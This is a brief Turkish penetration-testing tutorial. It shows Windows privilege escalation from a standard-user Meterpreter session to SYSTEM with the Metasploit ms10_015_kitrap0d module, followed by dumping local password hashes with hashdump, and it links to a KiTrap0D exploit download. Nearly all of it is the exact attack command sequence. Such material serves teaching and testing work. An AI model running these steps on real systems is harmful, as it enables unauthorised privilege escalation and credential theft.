Standart yetkilerle elde edilen Meterpreter bağlantısında yerel parola özetlerinin elde edilemediği görülmektedir. Bu yetkilere sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ms10_15_kirap0d istismar modülü seçilir.
getuid
hashdump
search ms10_015
use exploit/windows/local/ms10_015_kitrap0d
show options
Modüle, mevcut oturuma ait ID değeri verilir ve modül başlatılarak SYSTEM hakları elde edilir.
set SESSION 1
show options
run
getuid
Modülün SYSTEM hakları ile çalışan “notepad.exe” adlı bir proses oluşturduğu görülmektedir. Hak yükseltme işlemi sonrasında, yerel hesaplara ait bilgilerin elde edilebildiği görülmektedir.
getuid
getpid
ps -S notepad
hashdump
Bunun yanında KiTrap0d istismar kodu kullanılarak da hak yükseltilebilirdir.
https://packetstormsecurity.com/files/download/85449/KiTrap0D.zip
Kaynak:
http://blogagencysecurity.blogspot.com.tr/2011/11/old-privilege-escalation-techniques.html